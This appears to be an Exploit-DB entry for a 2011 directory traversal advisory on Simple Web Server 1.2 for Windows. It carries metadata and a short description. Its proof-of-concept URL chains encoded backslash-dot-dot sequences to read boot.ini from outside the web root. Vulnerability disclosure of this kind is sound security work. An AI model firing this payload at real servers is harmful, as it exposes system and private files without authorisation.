Simple Web Server 1.2 - Directory Traversal

Author: AutoSec Tools
type: remote
platform: windows
port: 
date_added: 2011-06-10  
date_updated: 2011-06-10  
verified: 1  
codes: OSVDB-72863  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comwebserv.zip  

raw file: 17381.txt  
------------------------------------------------------------------------
Software................Simple web-server 1.2
Vulnerability...........Directory Traversal
Threat Level............Serious (3/5)
Download................http://www.storecalc.com
Discovery Date..........6/1/2011
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A directory traversal vulnerability in Simple web-server 1.2 can be
exploited to read files outside of the web root.


--PoC--

http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini